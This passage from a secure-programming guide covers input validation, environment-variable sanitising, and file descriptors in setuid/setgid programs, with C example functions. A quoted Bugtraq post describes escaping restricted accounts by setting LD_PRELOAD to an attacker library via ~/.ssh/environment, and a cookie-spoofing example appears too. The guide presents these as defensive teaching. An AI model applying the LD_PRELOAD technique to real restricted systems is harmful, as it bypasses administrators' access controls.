decimal values 254 and 255, and character 133, which is the Unicode Next Line
(NEL) character used by OS/390).
|
||
Again, your code should not be checking for ``bad'' values; you should do
|
||
this check mentally to be sure that your pattern ruthlessly limits input
|
||
values to legal values.
|
||
If your pattern isn't sufficiently narrow, you need to carefully
|
||
re-examine the pattern to see if there are other problems.
|
||
</para>
|
||
|
||
<para>
|
||
Limit the maximum character length (and minimum length if appropriate),
|
||
and be sure to not lose control when such lengths are exceeded
|
||
(see <xref linkend="buffer-overflow"> for more about buffer overflows).
|
||
</para>
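<para>
As a minimal sketch of the ``define what is legal'' approach, the following
C function accepts a string only if its length is within the given bounds and
every character is in an explicit list of legal characters.
The function name is_legal_input() and the LEGAL_CHARS policy are
illustrative assumptions, not part of any standard library; choose
the legal set that fits your own data.
</para>

```c
#include <stddef.h>
#include <string.h>

/* Hypothetical policy: lowercase letters, digits, underscore, and hyphen. */
static const char LEGAL_CHARS[] = "abcdefghijklmnopqrstuvwxyz0123456789_-";

/*
 * Return 1 if input has between min_len and max_len characters and
 * every character appears in the legal set; return 0 otherwise.
 * Anything not explicitly listed as legal is rejected.
 */
int is_legal_input(const char *input, const char *legal,
                   size_t min_len, size_t max_len)
{
    size_t len;

    if (input == NULL || legal == NULL)
        return 0;
    for (len = 0; input[len] != '\0'; len++) {
        if (len >= max_len)
            return 0;               /* too long: stop scanning at once */
        if (strchr(legal, input[len]) == NULL)
            return 0;               /* character is not in the legal set */
    }
    return len >= min_len;          /* rejects the empty string if min_len > 0 */
}
```

<para>
A caller might use is_legal_input(name, LEGAL_CHARS, 1, 32) and refuse to
continue when it returns 0.
Note that the empty string, ``..'', anything containing ``/'', and any
control or high-bit character are all rejected without being named.
</para>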
|
||
|
||
<para>
|
||
Here are a few common data types, and things you should validate
|
||
before using them from an untrusted user:
|
||
<itemizedlist>
|
||
<listitem><para>
|
||
For strings, identify the legal characters or legal patterns
|
||
(e.g., as a regular expression) and reject anything not matching that form.
|
||
There are special problems when strings contain control characters
|
||
(especially linefeed or NIL) or metacharacters (especially shell
|
||
metacharacters); it is often
|
||
best to ``escape'' such metacharacters immediately when the input is received so
|
||
that such characters are not accidentally sent.
|
||
CERT goes further and recommends escaping all characters
|
||
that aren't in a list of characters not needing escaping [CERT 1998, CMU 1998].
|
||
See <xref linkend="handle-metacharacters">
|
||
for more information on metacharacters.
|
||
Note that
|
||
<ulink url="http://www.w3.org/TR/2001/NOTE-newline-20010314">
|
||
line ending encodings vary on different computers</ulink>:
|
||
Unix-based systems use character 0x0a (linefeed),
|
||
CP/M and DOS based systems (including Windows) use 0x0d 0x0a
|
||
(carriage-return linefeed, and some programs incorrectly reverse the order),
|
||
the Apple MacOS uses 0x0d (carriage return), and IBM OS/390 uses
|
||
0x85 (next line, sometimes called newline).
|
||
</para></listitem>
|
||
|
||
<listitem><para>
|
||
Limit all numbers to the minimum (often zero) and maximum allowed values.
|
||
</para></listitem>
|
||
|
||
<listitem><para>
|
||
A full email address checker is actually quite complicated, because there
|
||
are legacy formats that greatly complicate validation if you need
|
||
to support all of them; see mailaddr(7) and IETF RFC 822 [RFC 822]
|
||
for more information if such checking is necessary.
|
||
Friedl [1997] developed a regular expression to check if
|
||
an email address is valid (according to the specification);
|
||
his ``short'' regular expression is 4,724 characters,
|
||
and his ``optimized'' expression (in appendix B) is 6,598 characters long.
|
||
And even that regular expression isn't perfect; it can't recognize local
|
||
email addresses, and it can't handle nested parentheses in comments
|
||
(as the specification permits).
|
||
Often you can simplify and only permit the ``common'' Internet
|
||
address formats.
|
||
</para></listitem>
|
||
|
||
<listitem><para>
|
||
Filenames should be checked; see
|
||
<xref linkend="file-names"> for more information on filenames.
|
||
</para></listitem>
|
||
|
||
<listitem><para>
|
||
URIs (including URLs) should be checked for validity.
|
||
If you are directly acting on a URI (i.e., you're implementing a web
|
||
server or web-server-like program and the URL is a request for your data),
|
||
make sure the URI is valid, and be especially careful of URIs that
|
||
try to ``escape'' the document root (the area of the filesystem
|
||
that the server is responding to).
|
||
The most common ways to escape the document root are via ``..'' or
|
||
a symbolic link, so most servers check any ``..'' directories themselves
|
||
and ignore symbolic links unless specially directed.
|
||
Also remember to decode any encoding first (via URL encoding or
|
||
UTF-8 encoding), or an encoded ``..'' could slip through.
|
||
URIs aren't supposed to even include UTF-8 encoding, so the safest thing
|
||
is to reject any URIs that include characters with high bits set.
|
||
</para>
|
||
<para>
|
||
If you are implementing a system that uses the URI/URL as data,
|
||
you're not home-free at all; you need to ensure that malicious users
|
||
can't insert URIs that will harm other users.
|
||
See <xref linkend="Validating-uris">
|
||
for more information about this.
|
||
</para></listitem>
|
||
|
||
<listitem><para>
|
||
When accepting cookie values, make sure to check the domain value
|
||
for any cookie you're using
|
||
is the expected one. Otherwise, a (possibly cracked) related site
|
||
might be able to insert spoofed cookies.
|
||
Here's an example from IETF RFC 2965 of how failing to do this check could
|
||
cause a problem:
|
||
<itemizedlist>
|
||
<listitem><para>
|
||
User agent makes request to victim.cracker.edu, gets back
|
||
cookie session_id="1234" and sets the default domain
|
||
victim.cracker.edu.
|
||
</para></listitem>
|
||
<listitem><para>
|
||
User agent makes request to spoof.cracker.edu, gets back cookie
|
||
session_id="1111", with Domain=".cracker.edu".
|
||
</para></listitem>
|
||
<listitem><para>
|
||
User agent makes request to victim.cracker.edu again, and passes:
|
||
<programlisting>
|
||
Cookie: $Version="1"; session_id="1234",
|
||
$Version="1"; session_id="1111"; $Domain=".cracker.edu"
|
||
</programlisting>
|
||
The server at victim.cracker.edu should detect that the second
|
||
cookie was not one it originated by noticing that the Domain
|
||
attribute is not for itself and ignore it.
|
||
</para></listitem>
|
||
</itemizedlist>
|
||
</para></listitem>
|
||
</itemizedlist>
|
||
</para>
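<para>
For numbers, one possible way to enforce minimum and maximum values in C
is sketched below.
The name parse_bounded_long() is an assumption made for this example; it is
built on the standard strtol(3) call, and it deliberately refuses leading
whitespace, a leading plus sign, and trailing text, all of which strtol(3)
would otherwise tolerate.
</para>

```c
#include <errno.h>
#include <stdlib.h>

/*
 * Parse text as a decimal integer in the range [min, max].
 * On success store the value in *result and return 0; return -1 on
 * any malformed, out-of-range, or overflowing input.
 */
int parse_bounded_long(const char *text, long min, long max, long *result)
{
    char *end;
    long value;

    if (text == NULL || result == NULL)
        return -1;
    /* Only an optional '-' followed by digits is legal at the start. */
    if (!(text[0] == '-' || (text[0] >= '0' && text[0] <= '9')))
        return -1;
    errno = 0;
    value = strtol(text, &end, 10);
    if (errno == ERANGE)
        return -1;                  /* does not fit in a long */
    if (end == text || *end != '\0')
        return -1;                  /* no digits, or trailing junk */
    if (value < min || value > max)
        return -1;                  /* outside the permitted range */
    *result = value;
    return 0;
}
```

<para>
For example, a port number supplied by a user could be checked with
parse_bounded_long(text, 1, 65535, &amp;port), treating any nonzero
return as a rejected request.
</para>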
|
||
|
||
|
||
<para>
|
||
Unless you account for them,
|
||
the legal character patterns must not include characters
|
||
or character sequences that have special meaning to either
|
||
the program internals or the eventual output:
|
||
<itemizedlist>
|
||
<listitem><para>
|
||
A character sequence may have special meaning to the program's internal
|
||
storage format.
|
||
For example, if you store data (internally or externally) in delimited
|
||
strings, make sure that the delimiters are not permitted data values.
|
||
A number of programs
|
||
store data in comma (,) or colon (:) delimited text files;
|
||
inserting the delimiters
|
||
in the input can be a problem unless the program accounts for it (i.e.,
|
||
by preventing it or encoding it in some way).
|
||
Other characters often causing these problems include single and double quotes
|
||
(used for surrounding strings)
|
||
and the less-than sign "<"
|
||
(used in SGML, XML, and HTML to indicate a tag's beginning; this is important
|
||
if you store data in these formats).
|
||
Most data formats have an escape sequence to handle these cases; use it,
|
||
or filter such data on input.
|
||
</para></listitem>
|
||
<listitem><para>
|
||
A character sequence may have special meaning if sent back out to a user.
|
||
A common example of this is permitting HTML tags in data input that will later
|
||
be posted to other readers (e.g., in a guestbook or ``reader comment'' area).
|
||
However, the problem is much more general.
|
||
See <xref linkend="cross-site-malicious-content"> for a general discussion
|
||
on the topic, and see <xref linkend="filter-html"> for a specific discussion
|
||
about filtering HTML.
|
||
</para></listitem>
|
||
</itemizedlist>
|
||
</para>
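<para>
To illustrate the delimiter problem, here is a small sketch for a
hypothetical colon-delimited, one-record-per-line file.
The function name escape_field() and the backslash escaping convention are
assumptions for this example only; a real storage format will define its own
escape rules, and you should use those instead.
</para>

```c
#include <stddef.h>

/*
 * Copy in to out for storage in a colon-delimited record.
 * The field delimiter ':' and the escape character '\' are each
 * prefixed with a backslash.  Control characters (including newline,
 * the record delimiter in this hypothetical format) are rejected.
 * Returns 0 on success, or -1 if the input is rejected or out is too
 * small; on failure the contents of out must not be used.
 */
int escape_field(const char *in, char *out, size_t out_size)
{
    size_t used = 0;

    if (in == NULL || out == NULL || out_size == 0)
        return -1;
    for (; *in != '\0'; in++) {
        unsigned char c = (unsigned char)*in;

        if (c < 0x20 || c == 0x7f)
            return -1;              /* control character */
        if (c == ':' || c == '\\') {
            if (used + 2 >= out_size)
                return -1;          /* no room for escape, char, and NIL */
            out[used++] = '\\';
        } else if (used + 1 >= out_size) {
            return -1;              /* no room for char and NIL */
        }
        out[used++] = (char)c;
    }
    out[used] = '\0';
    return 0;
}
```

<para>
With this sketch, the input ``root:x'' is stored as ``root\:x'', so it
can no longer be mistaken for two fields, and an input containing a newline
is refused rather than silently creating a second record.
</para>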
|
||
|
||
<para>
|
||
These tests should usually be centralized in one place so that the
|
||
validity tests can be easily examined for correctness later.
|
||
</para>
|
||
|
||
<para>
|
||
Make sure that your validity test is actually correct; this is particularly
|
||
a problem when checking input that will be used by another program
|
||
(such as a filename, email address, or URL).
|
||
Often these tests have subtle errors, producing the so-called
|
||
``deputy problem'' (where the checking program
|
||
makes different assumptions than the program that actually uses the data).
|
||
If there's a relevant standard, look at it, but also search to see if
|
||
the program has extensions that you need to know about.
|
||
</para>
|
||
|
||
<para>
|
||
While parsing user input, it's a good idea to temporarily drop all privileges,
|
||
or even create separate processes (with the parser having permanently dropped
|
||
privileges, and the other process performing security checks against the
|
||
parser requests).
|
||
This is especially true if the parsing task is complex (e.g., if you use
|
||
a lex-like or yacc-like tool), or if the programming language
|
||
doesn't protect against buffer overflows (e.g., C and C++).
|
||
See
|
||
<xref linkend="minimize-privileges">
|
||
for more information on minimizing privileges.
|
||
</para>
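<para>
The following sketch shows one way a setuid/setgid C program might
temporarily drop its privileges around a parsing step, using the standard
seteuid(2) and setegid(2) calls.
The names struct saved_ids, drop_privileges_temporarily(), and
restore_privileges() are assumptions for this example.
Because the privileges can be restored, this does not protect against
an attacker who gains control of the process; it only limits accidental
damage, and a separate process with permanently dropped privileges is
stronger.
</para>

```c
#include <sys/types.h>
#include <unistd.h>

/* Effective ids in force before the temporary drop. */
struct saved_ids {
    uid_t euid;
    gid_t egid;
};

/* Switch the effective ids to the real ids.  Returns 0 on success. */
int drop_privileges_temporarily(struct saved_ids *saved)
{
    if (saved == NULL)
        return -1;
    saved->euid = geteuid();
    saved->egid = getegid();
    /* Drop the group first, while we still have the right to do so. */
    if (setegid(getgid()) != 0)
        return -1;
    if (seteuid(getuid()) != 0) {
        (void)setegid(saved->egid);     /* roll back the group change */
        return -1;
    }
    /* Never assume the calls worked; check the resulting state. */
    if (geteuid() != getuid() || getegid() != getgid())
        return -1;
    return 0;
}

/* Restore the effective ids recorded by drop_privileges_temporarily(). */
int restore_privileges(const struct saved_ids *saved)
{
    if (saved == NULL)
        return -1;
    if (seteuid(saved->euid) != 0)
        return -1;
    if (setegid(saved->egid) != 0)
        return -1;
    if (geteuid() != saved->euid || getegid() != saved->egid)
        return -1;
    return 0;
}
```

<para>
A program would call drop_privileges_temporarily() just before parsing
untrusted input and restore_privileges() only once the parsed result has
been checked, aborting if either call fails.
</para>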
|
||
|
||
<para>
|
||
When using data for security decisions (e.g., ``let this user in''),
|
||
be sure to use trustworthy channels.
|
||
For example, on a public Internet, don't just use the machine IP address
|
||
or port number as the sole way to authenticate users, because in most
|
||
environments this information can be set
|
||
by the (potentially malicious) user.
|
||
See
|
||
<xref linkend="trustworthy-channels"> for more information.
|
||
</para>
|
||
|
||
<para>
|
||
The following subsections discuss different kinds of inputs to a program;
|
||
note that input includes process state such as environment variables,
|
||
umask values, and so on.
|
||
Not all inputs are under the control of an untrusted user, so you need
|
||
only worry about those inputs that are.
|
||
</para>
|
||
|
||
<sect1 id="command-line">
|
||
<title>Command line</title>
|
||
|
||
<para>
|
||
Many programs take input from the command line.
|
||
A setuid/setgid program's command line data is provided by
|
||
an untrusted user, so a setuid/setgid program must defend itself from
|
||
potentially hostile command line values.
|
||
Attackers can send just about any kind of data through a command line
|
||
(through calls such as execve(2)).
|
||
Therefore, setuid/setgid programs must completely
|
||
validate the command line inputs and
|
||
must not trust the name of the program reported by command line argument zero
|
||
(an attacker can set it to any value including NULL).
|
||
</para>
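<para>
As a sketch of a first line of defense, a setuid/setgid C program could
run a check like the one below before looking at any argument.
The function name command_line_is_sane() and its limits are assumptions
for this example; it only verifies the shape of the argument list
(including the case where argument zero is missing), so each argument
still needs its own validation afterwards.
</para>

```c
#include <stddef.h>

/*
 * Return 1 if the argument vector has between 1 and max_args entries,
 * none of them is a NULL pointer (argument zero included), and none is
 * longer than max_arg_len characters; return 0 otherwise.
 */
int command_line_is_sane(int argc, char *const argv[],
                         int max_args, size_t max_arg_len)
{
    int i;
    size_t len;

    if (argv == NULL || argc < 1 || argc > max_args)
        return 0;                   /* execve(2) callers may pass argc == 0 */
    for (i = 0; i < argc; i++) {
        if (argv[i] == NULL)
            return 0;
        for (len = 0; argv[i][len] != '\0'; len++) {
            if (len >= max_arg_len)
                return 0;           /* argument is too long */
        }
    }
    return 1;
}
```

<para>
A program's main() might begin with a call such as
command_line_is_sane(argc, argv, 16, 1024) and exit immediately when it
returns 0, printing a fixed program name rather than argv[0] in any
error message.
</para>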
|
||
|
||
</sect1>
|
||
|
||
<sect1 id="environment-variables">
|
||
<title>Environment Variables</title>
|
||
|
||
<para>
|
||
By default, environment variables are inherited from a process' parent.
|
||
However, when a program executes another program, the calling program
|
||
can set the environment variables to arbitrary values.
|
||
This is dangerous to setuid/setgid programs, because their invoker can
|
||
completely control the environment variables they're given.
|
||
Since they are usually inherited, this also applies transitively; a
|
||
secure program might call some other program and, without special measures,
|
||
would pass potentially dangerous environment variable values on to the
|
||
program it calls.
|
||
The following subsections discuss environment variables and what to
|
||
do with them.
|
||
</para>
|
||
|
||
<sect2 id="env-vars-dangerous">
|
||
<title>Some Environment Variables are Dangerous</title>
|
||
|
||
<para>
|
||
Some environment variables are dangerous because
|
||
many libraries and programs are controlled by environment
|
||
variables in ways that are obscure, subtle, or undocumented.
|
||
For example, the IFS variable is used by the <emphasis remap="it">sh</emphasis> and <emphasis remap="it">bash</emphasis>
|
||
shells to determine which characters separate command line arguments.
|
||
Since the shell is invoked by several low-level calls
|
||
(like system(3) and popen(3) in C, or the back-tick operator in Perl),
|
||
setting IFS to unusual values can subvert apparently-safe calls.
|
||
This behavior is documented in bash and sh, but it's obscure;
|
||
many long-time users only know about IFS because of its use in breaking
|
||
security, not because it's actually used very often for its intended purpose.
|
||
What is worse is that not all environment variables are documented, and
|
||
even if they are, those other programs may change and add dangerous
|
||
environment variables.
|
||
Thus, the only real solution (described below) is to select the ones you
|
||
need and throw away the rest.
|
||
</para>
|
||
|
||
</sect2>
|
||
|
||
<sect2 id="env-storage-dangerous">
|
||
<title>Environment Variable Storage Format is Dangerous</title>
|
||
|
||
<para>
|
||
Normally, programs should use the standard access routines to access
|
||
environment variables.
|
||
For example, in C, you should get values
|
||
using getenv(3), set them using the
|
||
POSIX standard routine putenv(3) or the BSD extension setenv(3)
|
||
and eliminate environment variables using unsetenv(3).
|
||
I should note here that setenv(3) is implemented in Linux, too.
|
||
</para>
|
||
|
||
<para>
|
||
However, crackers need not be so nice; crackers can directly control the
|
||
environment variable data area passed to a program using execve(2).
|
||
This permits some nasty attacks, which can only be understood by
|
||
understanding how environment variables really work.
|
||
In Linux, you can see environ(5) for a summary of how environment variables
really work.
|
||
In short, environment variables are internally stored as a pointer to
|
||
an array of pointers to characters; this array is stored in order and
|
||
terminated by a NULL pointer (so you'll know when the array ends).
|
||
The pointers to characters, in turn, each
|
||
point to a NIL-terminated string value of the form ``NAME=value''.
|
||
This has several implications; for example, environment variable names
|
||
can't include the equal sign, and neither the name nor value can have
|
||
embedded NIL characters.
|
||
However, a more dangerous implication of this format is that it allows
|
||
multiple entries with the same variable name, but with different values
|
||
(e.g., more than one value for SHELL).
|
||
While typical command shells prohibit doing this,
|
||
a locally-executing cracker can create such a situation using execve(2).
|
||
</para>
|
||
|
||
<para>
|
||
The problem with this storage format (and the way it's set)
|
||
is that a program might check one of these values
|
||
(to see if it's valid) but actually use a different one.
|
||
In Linux,
|
||
the GNU glibc libraries try to shield programs from this;
|
||
glibc 2.1's implementation of getenv will always get the first matching
|
||
entry, setenv and putenv will always set the first matching entry, and
|
||
unsetenv will actually unset <emphasis remap="it">all</emphasis> of the matching entries
|
||
(congratulations to the GNU glibc implementers for implementing
|
||
unsetenv this way!).
|
||
However, some programs go directly to the environ variable and iterate
|
||
across all environment variables; in this case,
|
||
they might use the last matching entry instead of the first one.
|
||
As a result, if checks were made against the first matching entry instead,
|
||
but the actual value used is the last matching entry,
|
||
a cracker can use this fact to circumvent the protection routines.
|
||
</para>
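<para>
To make the duplicate-entry problem concrete, the following sketch walks an
environment array directly and counts how many entries carry a given name.
The function name count_env_entries() is an assumption for this example.
A result greater than one means that code taking the first match and code
taking the last match would see different values.
</para>

```c
#include <stddef.h>
#include <string.h>

/*
 * Count the entries in a NULL-terminated environment array whose
 * name is exactly name, i.e. entries of the form "name=value".
 */
size_t count_env_entries(char *const envp[], const char *name)
{
    size_t count = 0;
    size_t name_len;

    if (envp == NULL || name == NULL)
        return 0;
    name_len = strlen(name);
    for (; *envp != NULL; envp++) {
        /* The '=' test keeps SHELL from matching SHELLX=... */
        if (strncmp(*envp, name, name_len) == 0 &&
            (*envp)[name_len] == '=')
            count++;
    }
    return count;
}
```

<para>
A program could call count_env_entries(environ, "SHELL") very early and
treat any result above one as evidence of a hostile invoker, though
erasing the environment (described in the next section) remains the more
thorough defense.
</para>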
|
||
|
||
</sect2>
|
||
|
||
<sect2 id="env-var-solution">
|
||
<title>The Solution - Extract and Erase</title>
|
||
|
||
<para>
|
||
For secure setuid/setgid programs, the short list of environment variables
|
||
needed as input (if any) should be carefully extracted.
|
||
Then the entire environment should be erased,
|
||
followed by resetting a small set of necessary environment
|
||
variables to safe values.
|
||
There really isn't a better way if you make any calls to subordinate
|
||
programs; there's no practical
|
||
method of listing ``all the dangerous values''.
|
||
Even if you reviewed the source code of every program you call
|
||
directly or indirectly,
|
||
someone may add new undocumented environment variables after you
|
||
write your code, and one of them may be exploitable.
|
||
</para>
|
||
|
||
<para>
|
||
The simple way to erase the environment in C/C++
|
||
is by setting the global variable
|
||
<emphasis remap="it">environ</emphasis>
|
||
to NULL.
|
||
The global variable environ is defined in <unistd.h>; C/C++ users will
|
||
want to #include this header file.
|
||
You will need to manipulate this value before spawning threads, but that's
|
||
rarely a problem, since you want to do these manipulations very early in
|
||
the program's execution (usually before threads are spawned).
|
||
</para>
|
||
|
||
<para>
|
||
The global variable environ is defined in various standards; it's
|
||
not clear that the official standards condone directly changing its value,
|
||
but I'm unaware of any Unix-like system that has trouble
|
||
with doing this.
|
||
I normally just modify the ``environ'' directly;
|
||
manipulating such low-level components is possibly non-portable, but
|
||
it assures you that you get a clean (and safe) environment.
|
||
In the rare case where you need later access to the entire set of
|
||
variables, you could save the ``environ'' variable's value somewhere,
|
||
but this is rarely necessary; nearly all programs need only a few values,
|
||
and the rest can be dropped.
|
||
</para>
|
||
|
||
<para>
|
||
Another way to clear the environment
|
||
is to use the undocumented clearenv() function.
|
||
The function
|
||
clearenv() has an odd history; it was supposed to be defined in POSIX.1, but
|
||
somehow never made it into that standard.
|
||
However, clearenv() is defined in POSIX.9
|
||
(the Fortran 77 bindings to POSIX), so there is a quasi-official status for it.
|
||
In Linux,
|
||
clearenv() is defined in <stdlib.h>, but before using #include
|
||
to include it you must make sure that __USE_MISC is #defined.
|
||
A somewhat more ``official'' way to cause __USE_MISC to be defined
|
||
is to first #define either _SVID_SOURCE or _BSD_SOURCE, and then
|
||
#include <features.h> -
|
||
these are the official feature test macros.
|
||
</para>
|
||
|
||
|
||
<para>
|
||
One environment value you'll almost certainly re-add is PATH,
|
||
the list of directories to search for programs; PATH should
|
||
<emphasis remap="it">not</emphasis> include the current directory and should usually be something simple like
|
||
``/bin:/usr/bin''.
|
||
Typically you'll also set
|
||
IFS (to its default of `` \t\n'', where space is the first character)
|
||
and TZ (timezone).
|
||
Linux won't die if you don't supply either IFS or TZ,
|
||
but some System V based systems have problems if you don't supply a TZ value,
|
||
and it's rumored that some shells need the IFS value set.
|
||
In Linux, see environ(5) for a list of common environment variables that you
|
||
<emphasis remap="it">might</emphasis> want to set.
|
||
</para>
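<para>
Putting the extract-and-erase steps together, a minimal C sketch might look
like the following.
The names sanitize_environment() and tz_is_legal(), the TZ pattern, and the
64-byte limit are assumptions for this example.
It declares environ itself rather than relying on a header, and it assumes
a C library (such as GNU glibc) whose setenv(3) copes with environ having
been set to NULL.
</para>

```c
#ifndef _POSIX_C_SOURCE
#define _POSIX_C_SOURCE 200112L     /* for setenv(3) */
#endif
#include <stddef.h>
#include <stdlib.h>
#include <string.h>

extern char **environ;

/* Accept only short TZ values made of letters, digits, and "_+-/". */
static int tz_is_legal(const char *tz)
{
    size_t i;

    if (tz == NULL || tz[0] == '\0' || tz[0] == '/')
        return 0;
    for (i = 0; tz[i] != '\0'; i++) {
        unsigned char c = (unsigned char)tz[i];

        if (i >= 63)
            return 0;               /* must fit in 64 bytes with its NIL */
        if (!((c >= 'A' && c <= 'Z') || (c >= 'a' && c <= 'z') ||
              (c >= '0' && c <= '9') ||
              c == '_' || c == '+' || c == '-' || c == '/'))
            return 0;
    }
    return 1;
}

/* Extract what is needed, erase everything, then set safe values. */
int sanitize_environment(void)
{
    char tz_copy[64];
    const char *tz = getenv("TZ");
    int keep_tz = 0;

    if (tz_is_legal(tz)) {          /* extract and validate first */
        strcpy(tz_copy, tz);        /* length was checked above */
        keep_tz = 1;
    }
    environ = NULL;                 /* erase the entire environment */
    if (setenv("PATH", "/bin:/usr/bin", 1) != 0)
        return -1;
    if (setenv("IFS", " \t\n", 1) != 0)
        return -1;
    if (keep_tz && setenv("TZ", tz_copy, 1) != 0)
        return -1;
    return 0;
}
```

<para>
Such a function would be called at the very start of main(), before any
threads are created and before any library routine that consults the
environment; the program should exit if it returns a nonzero value.
</para>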
|
||
|
||
<para>
|
||
If you really need user-supplied values, check the values first
|
||
(to ensure that the values match a pattern for legal values and that they
|
||
are within some reasonable maximum length).
|
||
Ideally there would be some standard trusted file in /etc with the
|
||
information for ``standard safe environment variable values'',
|
||
but at this time there's no standard file defined for this purpose.
|
||
For something similar, you might want to examine the PAM module pam_env
|
||
on those systems which have that module.
|
||
If you allow users to set an arbitrary environment variable, then you'll
|
||
let them subvert restricted shells (more on that below).
|
||
</para>
|
||
|
||
<!-- I haven't seen ANYONE else discuss this in secure programming
|
||
guidelines, probably because shell isn't the best place to start
|
||
anyway, but may as well mention it. -->
|
||
|
||
<para>
|
||
If you're using a shell as your programming language,
|
||
you can use the ``/usr/bin/env'' program with the ``-'' option
|
||
(which erases all environment variables of the program being run).
|
||
Basically, you call /usr/bin/env, give it the ``-'' option,
|
||
follow that with the set of variables and their values you wish to set
|
||
(as name=value),
|
||
and then follow that with the name of the program to run and its arguments.
|
||
You usually want to call the program using the full pathname
|
||
(/usr/bin/env) and not just as ``env'', in case a user has created
|
||
a dangerous PATH value.
|
||
Note that GNU's env also accepts the options
|
||
"-i" and "--ignore-environment" as synonyms (they also erase the
|
||
environment of the program being started), but these aren't portable to
|
||
other versions of env.
|
||
</para>
|
||
|
||
<para>
|
||
If you're programming a setuid/setgid program in a language
|
||
that doesn't allow you to reset the environment directly,
|
||
one approach is to create a ``wrapper'' program.
|
||
The wrapper sets the environment to safe values, and then
|
||
calls the other program.
|
||
Beware: make sure the wrapper will actually invoke the intended program;
|
||
if it's an interpreted program, make sure there's no race condition possible
|
||
that would allow the interpreter to load a different program than the one
|
||
that was granted the special setuid/setgid privileges.
|
||
</para>
|
||
</sect2>
|
||
|
||
<sect2 id="env-var-dontset">
|
||
<title>Don't Let Users Set Their Own Environment Variables</title>
|
||
|
||
<para>
|
||
If you allow users to set their own environment variables,
|
||
then users will be able to escape out of restricted accounts
|
||
(these are accounts that are supposed to only let
|
||
the users run certain programs and not work as a general-purpose machine).
|
||
This includes letting users write or modify certain files in their home
|
||
directory (e.g., .login),
|
||
supporting conventions that load in environment variables from
|
||
files under the user's control (e.g., openssh's .ssh/environment file),
|
||
or supporting protocols that transfer environment variables
|
||
(e.g., the Telnet Environment Option; see CERT Advisory CA-1995-14
|
||
for more).
|
||
Restricted accounts should never be allowed to modify or add any
|
||
file directly contained in their home directory, and instead should be
|
||
given only a specific subdirectory that they are allowed to modify
|
||
(if they can modify any).
|
||
</para>
|
||
|
||
<para>
|
||
ari posted a detailed discussion of this problem on Bugtraq
|
||
on June 24, 2002:
|
||
<blockquote>
|
||
<para>
|
||
Given the similarities with certain other security issues, i'm surprised
|
||
this hasn't been discussed earlier. If it has, people simply haven't
|
||
paid it enough attention.
|
||
</para>
|
||
<para>
|
||
This problem is not necessarily ssh-specific, though most telnet daemons
|
||
that support environment passing should already be configured to remove
|
||
dangerous variables due to a similar (and more serious) issue back in
|
||
'95 (ref: [1]). I will give ssh-based examples here.
|
||
</para>
|
||
<para>
|
||
Scenario one:
|
||
Let's say admin bob has a host that he wants to give people ftp access
|
||
to. Bob doesn't want anyone to have the ability to actually _log into_
|
||
his system, so instead of giving users normal shells, or even no shells,
|
||
bob gives them all (say) /usr/sbin/nologin, a program he wrote himself
|
||
in C to essentially log the attempt to syslog and exit, effectively
|
||
ending the user's session. As far as most people are concerned, the
|
||
user can't do much with this aside from, say, setting up an encrypted
|
||
tunnel.
|
||
</para>
|
||
<para>
|
||
The thing is, bob's system uses dynamic libraries (as most do), and
|
||
/usr/sbin/nologin is dynamically linked (as most such programs are). If
|
||
a user can set his environment variables (e.g. by uploading a
|
||
'.ssh/environment' file) and put some arbitrary file on the system (e.g.
|
||
'doevilstuff.so'), he can bypass any functionality of /usr/sbin/nologin
|
||
completely via LD_PRELOAD (or another member of the LD_* environment
|
||
family).
|
||
</para>
|
||
<para>
|
||
The user can now gain a shell on the system (with his own privileges, of
|
||
course, barring any 'UseLogin' issues (ref: [2])), and administrator
|
||
bob, if he were aware of what just occurred, would be extremely unhappy.
|
||
</para>
|
||
<para>
|
||
Granted, there are all kinds of interesting ways to (more or less) do
|
||
away with this problem. Bob could just grit his teeth and give the ftp
|
||
users a nonexistent shell, or he could statically compile nologin,
|
||
assuming his operating system comes with static libraries. Bob could
|
||
also, humorously, make his nologin program setuid and let the standard C
|
||
library take care of the situation. Then, of course, there are also the
|
||
ssh-specific access controls such as AllowGroup and AllowUsers. These
|
||
may appease the situation in this scenario, but it does not correct the
|
||
problem.
|
||
</para>
|
||
<para>
|
||
... Now, what happens if bob, instead of using /usr/sbin/nologin, wants to
|
||
use (for example) some BBS-type interface that he wrote up or
|
||
downloaded? It can be a script written in perl or tcl or python, or it
|
||
could be a compiled program; doesn't matter. Additionally, bob need not
|
||
be running an ftp server on this host; instead, perhaps bob uses nfs or
|
||
veritas to mount user home directories from a fileserver on his network;
|
||
this exact setup is (unfortunately) employed by many bastion hosts,
|
||
password management hosts and mail servers---to name a few. Perhaps bob
|
||
runs an ISP, and replaces the user's shell when he doesn't pay. With
|
||
all of these possible (and common) scenarios, bob's going to have a
|
||
somewhat more difficult time getting around the problem.
|
||
</para>
|
||
<para>
|
||
... Exploitation of the problem is simple. The circumvention code would be
|
||
compiled into a dynamic library and LD_PRELOAD=/path/to/evil.so should
|
||
be placed into ~user/.ssh/environment (a similar environment option may
|
||
be appended to public keys in the authorized_keys file). If no
|
||
dynamically loadable programs are executed, this will have no effect.
|
||
</para>
|
||
<para>
|
||
ISPs and universities (along with similarly affected organizations)
|
||
should compile their rejection (or otherwise restricted) binaries
|
||
statically (assuming your operating system comes with static libraries)...
|
||
</para>
|
||
<para>
|
||
Ideally, sshd (and all remote access programs that allow user-definable
|
||
environments) should strip any environment settings that libc ignores
|
||
for setuid programs.
|
||
</para>
|
||
</blockquote>
|
||
</para>
|
||
</sect2>
|
||
</sect1>
|
||
|
||
<sect1 id="file-descriptors">
|
||
<title>File Descriptors</title>
|
||
|
||
<para>
|
||
A program is passed a set of ``open file descriptors'', that is,
|
||
pre-opened files.
|
||
A setuid/setgid program must deal with the fact that the user gets to
|
||
select what files are open and to what (within their permission limits).
|
||
A setuid/setgid program must not assume that opening a new file will always
|
||
open into a fixed file descriptor id, or that the open will succeed at all.
|
||
It must also not assume that standard input (stdin),
|
||
standard output (stdout), and standard error (stderr)
|
||
refer to a terminal or are even open.
|
||
</para>
|
||
|
||
<para>
|
||
The rationale behind this is easy; since an attacker can open or
|
||
close a file descriptor before starting the program,
|
||
the attacker could create an unexpected situation.
|
||
If the attacker closes the standard output, when the program opens
|
||
the next file it will be opened as though it were standard output,
|
||
and then it will send all standard output to that file as well.
|
||
Some C libraries will automatically open stdin, stdout, and stderr
|
||
if they aren't already open (to /dev/null), but this isn't true on
|
||
all Unix-like systems.
|
||
Also, these libraries can't be completely depended on; for example,
|
||
on some systems it's possible to create a race condition
|
||
that causes this automatic opening to fail (and still run the program).
|
||
<!-- OpenBSD, May 2002; see Bugtraq -->
|
||
</para>
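<para>
Since the C library cannot be relied on to do this, a program can check
the three standard descriptors itself.
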